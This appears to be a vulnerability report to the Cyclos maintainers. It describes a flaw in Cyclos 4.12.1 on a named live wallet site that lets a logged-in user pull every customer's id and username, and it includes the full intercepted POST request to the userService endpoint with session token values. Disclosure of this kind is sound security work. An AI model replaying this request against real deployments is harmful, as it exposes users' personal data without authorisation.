I found a problem on Cyclos 4.12.1, please help me check this!
I can get all customers data: id, username ... with 3 steps
https://wallet.vndc.io/web-rpc/userService
Step 1: Login https://wallet.vndc.io by user account
Step 2: Click menu User and Searching
Step 3: Intercept request
Many Thanks!
POST /web-rpc/userService HTTP/1.1
Host: wallet.vndc.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Session-Prefix: gMX8JYM8QJBVQWaL
Channel: main
Content-Type: application/json
Referer: https://wallet.vndc.io/
Content-Length: 492
Cookie: Session-Token=G6Cw9lePI4sZdjLx
Connection: close
{"operation":"search", "params":[{"class":"org.cyclos.model.users.users.UserQuery", "mapDirectory":false, "locateFirst":false, "includeGlobal":false, "orderBy":"RELEVANCE", "userStatus":["ACTIVE","BLOCKED"], "ignoreProfileFieldsInList":false, "onlyContacts":false, "excludeContacts":false, "includeGroup":false, "includeGroupSet":false, "includeMainBroker":false, "messagesEnabled":false, "productsIndividuallyAssigned":false, "currentPage":0, "pageSize":40, "addressResult":"NO_ADDRESSES"}]}